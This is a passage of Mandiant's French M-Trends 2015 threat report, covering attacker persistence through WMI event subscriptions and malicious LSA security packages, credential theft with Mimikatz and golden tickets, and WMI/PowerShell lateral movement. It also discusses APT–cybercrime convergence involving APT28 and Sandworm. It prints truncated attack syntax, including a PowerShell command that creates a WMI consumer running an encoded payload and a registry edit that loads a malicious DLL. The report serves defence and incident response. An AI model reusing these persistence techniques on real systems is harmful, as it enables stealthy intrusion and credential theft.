  • 18. 16 www.mandiant.com Les nouvelles du frontM-Trends Figure 7 : Comment les attaquants utilisent WMI pour maintenir une présence persistante WMI interroge régulièrement le système sur la requête dans le filtre d’événements. Dans cet exemple, la condition associée au filtre est remplie tous les jours à 08h05.2 Une fois le filtre activé, WMI lance automatiquement le consommateur d’événe- ments qui lui est rattaché. Cet exemple montre une partie du consommateur de ligne de commande exécutant un script PowerShell avec un code malveillant fourni sous forme d’argument encodé en Base64. 3 L’attaquant crée trois objets WMI à partir de commandes Powershell : un consom- mateur qui exécute une commande ou un script, un filtre qui interroge le système sur un événement récurrent et une liaison pour relier le filtre au consommateur. 1 Espace de noms WMI (rootsubscription) Consommateur d’événements « Exécuter ce script ou cette commande... » Filtre d’événements « Rechercher cet événement récurrent dans le système... » Liaison consommateur-filtre « Utiliser ce filtre pour déclencher ce consommateur » Set-WmiInstance SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60 CommandLineTemplate="C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe –NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..."
  • 19. www.mandiant.com 17 La figure 8 montre un exemple de syntaxe PowerShell permettant de créer un consomma- teur WMI de ligne de commande, chargé à son tour d’exécuter le programme powershell.exe – avec en argument une chaîne encodée en Base64. N’importe quel code PowerShell (par exemple un programme de téléchargement ou une porte dérobée standard) pourra être ajouté à cette chaîne, et ce sans aucun fichier de script sur le disque. Rattaché à un filtre d’événements approprié, ce consommateur pourra s’exécuter de manière récurrente. La persistance établie via WMI place les analystes forensiques devant plusieurs défis. Non seulement les commandes PowerShell permettent aux attaquants de créer des filtres et des consommateurs exécutables à la fois en local et à distance, mais contrairement à de nombreux mécanismes de persistance, ils ne laissent aucune trace dans le registre. Par ailleurs, les objets sont stockés sur disque dans une base de données complexe (le référen- tiel WMI object.data) et parfois difficile à analyser. Enfin, Windows n’audite les filtres et consomma- teurs nouvellement créés ou déclenchés que lorsque la journalisation de niveau débogage est activée. Or, cette journalisation n’est ni paramé­ trée par défaut, ni destinée à être utilisée à long terme en raison du volume important d’événe- ments qu’elle génère.5 Packages de sécurité malveillants À plusieurs occasions, les attaquants se sont ser- vis des packages de sécurité LSA (Local Security Authority) de Windows pour charger automa- tiquement des malwares tout en échappant aux systèmes de détection. Les packages de sécurité sont un ensemble de fichiers DLL chargés par la LSA au démarrage du système et configurés sous le paramètre « Valeurs » de la clé de registre HKLM SYSTEMCurrentControlSet ControlLsa. Chacune de ces valeurs contient une liste de chaînes référençant des noms de fichiers (sans extension) à charger depuis %SYSTEMROOT%system32. Étant automatiquement chargés via le fichier LSASS.EXE, les packages LSA permettent à un attaquant doté de privilèges administrateur d’ajouter ou modifier les valeurs nécessaires pour maintenir la présence d’un fichier DLL malveillant. Ainsi, une de nos enquêtes menées en 2014 a révélé une modification de la valeur Packages de sécurité pour maintenir la présence du chargeur d’une porte dérobée multi-étapes, tspkgEx.dll, sur le système.6 La figure 9 illustre la valeur modifiée. Ce changement contraint le programme LSASS.EXE à lancer le fichier DLL tspkgEx (C: WINDOWSsystem32tspkgEx.dll) au démarrage du système. 5 Organisés lors de la conférence Mandiant MIRcon 2014, les débats consacrés à WMI et PowerShell fournissent de plus amples détails et des études de cas sur ces techniques – ainsi que des recommandations pour la détection et l’analyse forensique. Pour visionner les présentations, rendez-vous sur https://dl.mandiant.com/EE/library/MIRcon2014/ MIRcon_2014_IR_Track_There%27s_Something_About_WMI.pdf et https://dl.mandiant.com/EE/ library/MIRcon2014/MIRcon_2014_IR_Track_ Investigating_Powershell_Attacks.pdf. 6 Dans cet exemple, nous avons « désinfecté » le nom de la DLL. Figure 8 : Extrait de commande PowerShell pour la création d’un consommateur WMI Set-WmiInstance -Namespace “rootsubscription” -Class ‘CommandLineEventConsum- er’ -Arguments @{ name=’EvilWMI’;CommandLineTemplate=”C:WINDOWSSystem32 WindowsPowerShellv1.0powershell.exe –enc SQBuAHYAbwBrAGUALQBDAG8AG8A- bQ...<SNIP>”;RunInteractively=’false’} Figure 9 : Modification de la clé HKLMSYSTEMCurrentControlSetControlLsaSecurity Packages pour le chargement du malware PACKAGES DE SÉCURITÉ (avant modification): kerberos msv1_0 schannel wdigest tspkg pku2u PACKAGES DE SÉCURITÉ (après modification): kerberos msv1_0 schannel wdigest tspkg pku2u tspkgEx
  • 20. 18 www.mandiant.com Les nouvelles du frontM-Trends L’extensibilité de LSA permet d’utiliser des pack- ages de sécurité personnalisés pour traiter les identifiants des utilisateurs lors d’une ouverture de session. Or, un package de sécurité malveil- lant peut détourner cette fonctionnalité pour capturer des mots de passe en clair au moment de la connexion. Une de nos enquêtes menées en 2014 a mis en lumière ce mode opératoire par lequel un atta- quant a chargé un malware sous forme de pack- age de sécurité qui lui a permis de faire main basse sur des mots de passe. Largement dispo- nible, le kit d’attaque Mimikatz7 intègre égale- ment un outil, mimilib ssp, capable de voler des mots de passe une fois lancé.8 Vol de mots de passe en toute simplicité Très répandus, les outils de vol d’identifiants ont grandement facilité la collecte de mots de passe et l’escalade de privilèges dans les environne- ments Windows. En 2014, les auteurs d’attaques ciblées ont eu principalement recours à deux techniques : • La méthode « pass-the-hash » pour s’authentifier à l’aide de hashs NTLM volés • L’outil Mimikatz pour récupérer les mots de passe en clair dans la mémoire À défaut de neutraliser complètement ces méthodes, Microsoft est parvenu à en réduire l’efficacité sur ses systèmes Windows Server 2012 R2 et Windows 8.1. Or, la plupart des entreprises avec lesquelles nous avons travaillé l’an dernier exploitaient encore des domaines fonctionnels Windows Server 2008 et des terminaux Windows 7. De fait, « pass-the-hash » continue de faire des ravages, notamment dans les environnements où les mots de passe des administrateurs locaux sont communs à tout un groupe de systèmes. Quant à Mimikatz, il va encore plus loin en récu- pérant les mots de passe Windows en clair que l’OS stocke en mémoire pour gérer les diffé- rentes formes d’authentifications uniques (SSO). Sur le poste de travail d’un salarié, le risque peut se limiter au seul mot de passe du compte de son domaine. Mais dans le cas d’un serveur partagé gérant de nombreuses sessions de connexion interactives, par exemple via le protocole RDP (Remote Desktop Protocol) ou l’utilitaire PsExec, le nombre de mots de passe exposés sera beaucoup plus élevé. Les entreprises victimes n’ont pu que constater l’incroyable vitesse avec laquelle l’infection de quelques systèmes pouvait se propager à un domaine Active Directory complet. Presque toutes nos investigations ont révélé l’incapacité des logiciels anti-virus des entre­ prises à stopper Mimikatz, et ce malgré la réputation et le vaste champ d’action de cet outil. Pour échapper aux systèmes de détection, les attaquants n’ont souvent eu qu’à modifier et recompiler le code source. Mais ils ont aussi déployé des variantes de l’outil, comme le script PowerShell « Invoke-Mimikatz » qui s’exécute uniquement en mémoire. L’année 2014 a également vu l’émergence d’un certain nombre d’attaques visant Kerberos, le mécanisme d’authentification par défaut des domaines Windows récents. Au premier rang de ces attaques, on trouve le « golden ticket » Mimikatz, qui permet à un intrus ayant com- promis un contrôleur de domaine d’émettre un ticket TGT (ticket-granting ticket) pour n’importe quel utilisateur. Presque toutes nos investigations ont révélé l’incapacité des logiciels anti- virus des entreprises à stopper Mimikatz, et ce malgré la réputation et le vaste champ d’action de cet outil. Pour échapper aux systèmes de détection, les attaquants n’ont souvent eu qu’à modifier et recompiler le code source. 7 https://github.com/gentilkiwi/mimikatz5 8 Lors du MIRCon 2014, Matt Graeber a présenté ses nouvelles analyses sur les packages de sécurité malveillants et les mécanismes permettant de les détecter et d’en limiter l’exploitation. À consulter sur https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_ SSP.pdf
  • 21. www.mandiant.com 19 Ce « ticket en or » porte bien son nom puisqu’il peut être généré hors ligne, rester valide pour une durée indéterminée et être utilisé pour usurper n’importe quel compte – même après la réinitialisation d’un mot de passe. Une fois ce ticket en main, un attaquant peut se réintroduire sur un environnement « assaini » et se réappro- prier instantanément les privilèges administra- teur du domaine. À défaut de pouvoir éviter la compromission initiale, le seul moyen d’y remédier consiste à réinitialiser deux fois de suite le mot de passe krbtgt, nom du compte de service de distribution de clés Kerberos. Cette procédure permet d’effa- cer l’historique des mots de passe du compte et d’annuler tous les tickets Kerberos précédem- ment émis. Déplacements latéraux avec WMI et PowerShell Par le passé, les déplacements latéraux et exécu- tions de commandes d’attaque contre un envi- ronnement Windows combinaient généralement des utilitaires Windows intégrés (net, at, etc.), des malwares personnalisés, des scripts de commandes ou Visual Basic, et des outils d’admi- nistration courants comme PsExec. Prisées des attaquants du fait de leur fiabilité et de leur simplicité d’utilisation, ces techniques laissent cependant derrière elles bon nombre de traces et d’empreintes compromettantes. C’est ainsi qu’entre 2013 et 2014, nous avons observé une évolution manifeste des modes de déplacement latéral des groupes APT (Advanced Persistent Threat) que nous surveillons. Désor- mais, ces groupes ont davantage recours au système WMI et au langage PowerShell pour se déplacer latéralement, voler des identifiants et glaner des informations utiles dans les environ- nements Windows. De même, un grand nombre de chercheurs en sécurité et d’outils de tests d’intrusion ont adop- té le langage PowerShell ces dernières années. Cette généralisation a entraîné une plus grande diffusion publique d’informations et de codes source dont chaque camp profite pour se perfectionner. Nous avons décrit plus haut la manière dont les attaquants exploitent des événements WMI pour maintenir leur présence dans des environ­ nements compromis. Outre cette méthode, ils utilisent également l’outil de ligne de commande wmic.exe pour étendre les fonctionnalités de WMI aux scripts et à l’interface système (shell). WMI leur sert à se connecter à des systèmes distants, modifier le registre, accéder aux jour- naux d’événements et, plus important encore, exécuter des commandes. Hormis un événement d’ouverture de session initiale, les commandes WMI à distance ne laissent que très peu de preuves sur le système infiltré. Dans plusieurs cas analysés en 2014, les atta- quants se sont appuyés sur des commandes PowerShell à distance et des scripts en mémoire pour se déplacer latéralement et récupérer des données d’identification. Un code PowerShell peut s’exécuter en mémoire sans jamais passer par les disques du système infiltré, limitant ainsi toute forme de trace. De plus, les anciennes versions de PowerShell installées par défaut dans la plupart des environnements ne peuvent maintenir aucune piste d’audit détaillée du code exécuté. À RETENIR : Les auteurs d’APT ne cessent d’améliorer leurs outils et tactiques pour laisser un minimum de traces et échapper aux systèmes de détection. C’est pourquoi les entreprises ciblées doivent maintenir des dispositifs de surveillance en temps réel et d’analyse forensique post-incident sur tous leurs terminaux, sources de journaux et équipements réseau. Elles veilleront également à établir des seuils d’activité normale et à intervenir proactivement en cas d’écart pour garder un coup d’avance sur les attaquants.
  • 22. 20 www.mandiant.com Les nouvelles du frontM-Trends N ous avons passé l’an dernier à enquêter sur des attaques qui nous ont permis de remonter jusqu’à la piste russe. Ces investigations ont toutefois révélé des zones d’ombre qui rendent très difficile la distinction entre les gangs de cybercriminels d’une part, et les groupes étatiques d’autre part. Dans ce contexte de fusion des divers outils et méthodes, vous devrez orienter votre analyse sur les inten- tions des attaquants pour en évaluer l’impact potentiel. Certaines des attaques ciblées à caractère fi- nancier que nous avons disséquées présentent une physionomie qui tient davantage des orga- nisations étatiques que du profil type du cyber- criminel opportuniste. La figure 10 en page 21 fait un point sur les croisements entre les groupes APT connus et les cas de cybercrimes que nous avons rencontrés en 2014. Évaluer l’intention dans un climat d’incertitude : une tâche délicate Étant donné ces chevauchements, les analystes doivent aborder leur décryptage des motiva- tions avec une grande ouverture d’esprit. En ce sens, il ne suffit pas de se pencher sur tel outil ou telle méthode de manière isolée. Certaines activités observées en Russie l’an passé mettent en évidence l’importance et la difficulté d’une analyse des objectifs finaux pour l’interprétation de leur démarche technique. En octobre 2014, nous avons exposé le détail des activités d’APT28, un groupe que nous soup- çonnons d’exfiltrer de l’intelligence politique et militaire au profit du gouvernement russe. Depuis des années, APT28 s’en prend à l’indus- trie de la défense, aux puissances étrangères, aux complexes militaires et aux organismes intergouvernementaux. Des chercheurs ont également révélé l’existence d’un autre groupe basé en Russie et qui, comme APT28, semble mener des activités d’espion- nage pour Moscou. Cette seconde filière est connue sous divers noms : “Sandworm Team,”9 “Quedagh”10 et “BE2 APT.”11 TENDANCE 4 : ENTRE CYBERCRIMINELS ET GROUPES APT, LA FRONTIÈRE S’ESTOMPE Les enquêtes menées l’an passé révèlent l’émergence d’une nouvelle tendance : les cybercriminels tendent à s’inspirer des méthodes des auteurs d’APT, tandis que de leur côté, ces derniers utilisent des outils déjà très en vogue chez les cybercriminels. Face à cette convergence, il devient impératif de bien cerner les motivations d’une attaque pour en évaluer l’impact et développer une stratégie de sécurité basée sur le risque. 9 Cyber Espionage Operators Sandworm Team Leverage CVE-2014-4114 Zero-Day.” iSight Partners. 14 octobre 2014. Web. 2 décembre 2014. 10 https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf 11 https://securelist.com/blog/research/67353/be2-custom-plugins-router-abuse-and-target-profiles/
  • 23. www.mandiant.com 21 12 https://www.fireeye.com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-grey.html 13 APT18 est également un groupe basé en Chine. Voir https://www2.fireeye.com/WBNR-14Q3HealthcareWebinar.html TACTIQUES EXEMPLES DE CROISEMENTS Ingénierie sociale L’ingénierie sociale n’est pas la chasse gardée des groupes APT. En 2014, certaines attaques à caractère financier ont eu recours au spearphishing et à ses e-mails ciblés, tant pour l’infection initiale que lors de tentatives de reprise de contrôle de l’environnement post-neutralisation. L’ingénierie sociale interactive représente une autre méthode utilisée à la fois chez les cyber- criminels et les groupes APT. Sur l’une de nos missions, une attaque à motivation financière était passée par des profils professionnels factices sur les réseaux sociaux. Le but : établir le contact avec les salariés de l’entreprise ciblée et les inciter à télécharger un malware d’installation d’une porte dérobée. De son côté, APT3, un groupe soupçonné de travailler pour une puissance étrangère, a créé de toutes pièces un personnage de femme d’affaires qu’il a ensuite utilisé pour contacter un collaborateur de sa cible sur un grand réseau social professionnel. Après trois semaines d’échanges de messages, “elle” a envoyé son “CV” à l’adresse e-mail personnelle de son interlocuteur – CV qui contenait en fait une porte dérobée du groupe APT3. Son travail de sape s’est également étendu à d’autres collaborateurs de l’entreprise par des questions de type « Quel est le nom de votre directeur informatique ? » ou « Vous utilisez quelle version de ce logiciel ? ». Outils et malwares personnalisés La création d’outils personnalisés a cours tant dans le milieu des APT que du cybercrime financier. Dans un cas précis, les cybercriminels ont même déployé plus de 60 variantes de malwares et d’uti- litaires qu’ils avaient améliorés au cours de plusieurs années de présence furtive dans l’environne- ment de la victime. Pour sa part, le groupe russe APT28 a passé ces sept dernières années à amélio- rer la flexibilité de ses malwares de manière à maintenir sa présence dans un environnement infecté. Crimeware On retrouve dans cette catégorie tous les toolkits accessibles gratuitement ou vendus à des fins lucratives. Le crimeware n’est cependant pas l’apanage des cybercriminels. Ainsi, un groupe sus- pecté de lancer des attaques APT depuis la Russie a utilisé un exploit zero-day pour installer des variantes de BlackEnergy, un toolkit très prisé des cybercriminels depuis des années. Dans un milieu comme dans l’autre, les outils d’accès distant sont omniprésents12 , preuve s’il en est que les outils eux-mêmes ne peuvent constituer le seul facteur déterminant dans l’attribution d’une attaque. Maintien de la persistance Le cybercrime n’est plus dominé par le « smash-and-grab », sorte de vol éclair avec effraction. En effet, si la persistance a longtemps été la signature des auteurs d’APT, qui maintiennent leur pré- sence dans un environnement jusqu’à l’accomplissement de leur mission, le cybercrime financier montre de plus en plus sa capacité à agir en sous-marin. Dans un cas précis, les cybercriminels sont passés par les registres de démarrage Windows pour lancer le malware qui leur a permis de main- tenir une présence incognito dans l’environnement. Dans un autre cas de figure, les malfaiteurs sont parvenus à agir secrètement pendant 5 ans avant d’être débusqués. Nous avons même obser- vé chez eux des tentatives de réimplantation dans l’environnement dont ils venaient d’être chassés. Étendue du vol de données Le vol de données s’opère sur une échelle plus large et sur des ensembles de données plus volu- mineux que jamais. Ainsi, les attaquants ont poursuivi leur offensive sur de vastes référentiels de données d’identification personnelle (PII, Personally Identifiable Information). Historiquement, ces vols de données étaient systématiquement imputés au milieu du cybercrime financier qui les utilisait soit pour ses propres activités frauduleuses, soit pour les revendre sur un marché sous- terrain. Or, les PII attirent désormais la convoitise des auteurs d’APT, et ce pour des raisons totalement étrangères à tout appât du gain. Pour preuve, nous avons mis au grand jour des vols de PII commis par le groupe APT18 – une activité qui sort de son périmètre d’action habituel.13 Figure 10 : La convergence des méthodes entre groupes APT et cybercriminels
  • 24. 22 www.mandiant.com Les nouvelles du frontM-Trends 14 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/ 15 https://www.virusbtn.com/conference/vb2014/abstracts/LM3-LipovskyCherepanov.xml 16 BlackEnergy offre un framework extensible qui permet aux hackers d’ajouter de nouvelles caractéristiques et fonctionnalités via des bibliothèques DLL (Dynamic Link Library). Chaque plugin DLL peut être codé pour un usage spécifique, puis stocké dans un fichier crypté. En surface, ils ont tous la même apparence, ce qui complique le décryptage des intentions du hacker. Très prisé des cybercriminels, BlackEnergy est souvent utilisé pour des attaques de déni de service (DDoS). (Voir http:// atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf; http://blogs.mcafee.com/business/ security-connected/evolving-ddos-botnets-1- blackenergy) 17 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/ Le groupe ciblait manifestement les mêmes profils de victimes qu’APT28, avec toutefois quelques différences clés. À commencer par les exploits zero-day et les outils de cybercrime utilisés. On le soupçonne par ailleurs de s’être attaqué à des infrastructures critiques aux États-Unis.14, 15 Les analyses du malware et de l’infrastructure utilisés ont révélé que l’équipe Sandworm s’est servie du toolkit BlackEnergy16 pour cibler des victimes en Ukraine, faisant ainsi écho aux tensions actuelles avec la Russie. Le groupe aurait également déployé ce toolkit pour cibler des équipements SCADA (Supervisory Control and Data Acquisition), très présents dans les infrastructures critiques et les environnements industriels.17 De même, les outils de production de diverses industries se sont trouvés au cœur de la tempête. En revanche, les prototypes mis au point par ces entreprises et les réseaux contenant et trans- mettant des informations sensibles (financières et de propriété intellectuelle) n’ont pas été tou- chés. On peut donc en déduire que les attaques cherchaient des faiblesses à exploiter pour commettre des actes de sabotage. En faisant appel à du crimeware comme BlackEnergy, ils tentaient vraisemblablement de garder un certain degré d’anonymat. Ces différences ont-elles une importance ? Dans le monde de la sécurité, le débat reste ou- vert sur l’intérêt même de discerner les motiva- tions d’une attaque et de l’attribuer à tel ou tel auteur. Certains avancent le fait que d’un point de vue réseau, peu importe qui se cache derrière la compromission : il faut d’abord la stopper et l’éradiquer. De même, la convergence des outils et méthodes employés par les cybercriminels et les auteurs d’APT complique encore un peu plus la question autour de l’intention et de l’impact potentiel. Et l’on ne parle même pas des dénégations et manœuvres trompeuses des attaquants, des disparités dans les mesures de répression, ou des liens alambiqués que certains agents des pouvoirs publics entretiennent avec la pègre. Dans ce tableau pour le moins confus, le décryptage des intentions et motivations d’une attaque pourra guider votre intervention. Prenons l’exemple d’un groupe russe menant des activités de cyberespionnage au profit d’un gouvernement. Derrière des outils de crime- ware d’apparence classique, les attaquants chercheront en fait à accéder à distance à des pans entiers d’infrastructure critique aux États-Unis. On comprend dès lors qu’une telle attaque ne pourra pas être traitée de la même manière qu’une menace financière ordinaire, et ce malgré les similitudes dans l’arsenal utilisé. Le fait de savoir si un malware est un vecteur d’infection préalable à l’attaque d’un groupe étatique, ou une simple menace mineure aux effets bénins, changera sans aucun doute la nature de votre réaction et de votre interven- tion. De même, le vol de données orchestré par des cybercriminels exigera une réponse différente, compte tenu de l’immédiateté de l’impact — contrairement à l’espionnage d’État dans lequel l’usage de l’intelligence exfiltrée est beaucoup plus nébuleux. À RETENIR : Dans un contexte de convergence des outils, techniques et pro- cédures utilisés par les cybercriminels d’une part, et les auteurs d’APT d’autre part, vous devrez passer au crible les intentions et les motivations de chaque attaque. Seule cette rigueur d’analyse vous permettra de bien diagnostiquer l’impact potentiel d’un incident de sécurité, d’y répondre de manière adaptée et d’aligner votre stratégie de défense sur la typologie des menaces en présence.
  • 25. www.mandiant.com 23 À l’heure où la cybersécurité prend le devant de la scène, les entreprises doivent aborder la question des vols de données sous un angle nouveau — non pas comme une source d’embarras et de crispation, mais bien comme une réalité économique. Ils devront pour cela anticiper et affronter les incidents de sécurité avec confiance. Or, cette attitude volontariste appelle à une nou- velle approche de la cybersécurité. Personne ne peut prévenir toutes les compromissions. Mais la prévention, la détection, l’analyse et la neutra- lisation rapides et efficaces des menaces les plus avancées vous permettront de vous prémunir vous-mêmes, vos clients et vos partenaires contre les conséquences désastreuses qui font la une des médias. La sécurité infaillible n’existe pas. Personne ne peut prévoir les nouvelles techniques d’infiltra- tion. Et comme 2014 nous l’a rappelé, aucun groupe d’attaque ne baissera pavillon sous le seul prétexte qu’un nouvel outil de sécurité est parvenu à le neutraliser. Il n’en reste pas moins qu’avec un bon dosage de technologies, d’intelligence et d’expertise, les entreprises peuvent entamer un processus de renforcement de leur sécurité. Ainsi, elles seront capables de s’adapter pour garder un coup d’avance sur les nouvelles menaces, les nou- veaux outils et les nouveaux moyens de compromission des réseaux. Si les méchants sont rusés, bien équipés et déterminés, il n’y a aucune raison que les gentils ne le soient pas aussi. CONCLUSION L’an dernier, les attaquants ont poursuivi leur mutation, à mesure qu’ils élargis- saient leur cible et modifiaient leurs modes opératoires. L’histoire est pourtant restée la même : beaucoup trop d’entreprises n’étaient pas préparées à des compromissions pourtant inévitables, laissant ainsi les attaquants agir trop long- temps en toute quiétude dans les environnements compromis.
  • 26. 24 www.mandiant.com Les nouvelles du frontM-Trends À propos de Mandiant Mandiant, une entreprise FireEye, compte à son actif d’innombrables missions de réponse à incident et d’élimination des groupes d’attaques avancés pour des centaines de clients dans tous les grands secteurs d’activité. Nous sommes l’interlocuteur privilégié des grands groupes et administrations qui veulent se protéger et réagir à des incidents de sécurité critiques de toutes natures. En cas d’intrusion avérée, les services de conseil en sécurité de Mandiant interviennent à vos côtés pour riposter et reprendre le contrôle de vos réseaux, avec l’appui de la cyberveille et des technologies FireEye. À propos de FireEye FireEye intervient dans le monde entier pour protéger les ressources critiques contre tout acte malveillant. Ensemble, nos technologies, notre cyberveille, notre expertise et notre équipe d’interven- tion rapide vous aident à éliminer l’impact des attaques informatiques. Nous débusquons et neutrali- sons les attaquants à chaque étape d’une intrusion. Avec FireEye, vous détectez les attaques en temps réel. Vous évaluez le risque qu’elles posent pour vos ressources stratégiques. Et vous disposez des moyens de réponse et de résolution des incidents de sécurité. La FireEye Global Defense Community comprend plus de 2 700 clients dans 67 pays, dont 157 entreprises du Fortune 500.
  • 27.
  • 28. Mandiant, une entreprise FireEye  |  (+1) 703.683.3141  |  (+1) 800.647.7020 |  info@mandiant.com  |  www.mandiant.com | www.fireeye.com © 2015 FireEye, Inc. Tous droits réservés. Mandiant et le logo M sont des marques déposées de FireEye, Inc. Toutes les autres marques, produits ou noms de service sont, ou peuvent être, des marques commerciales ou de service de leurs détenteurs respectifs. RPT.MTRENDS.FR-FR.022415 A FireEye® Company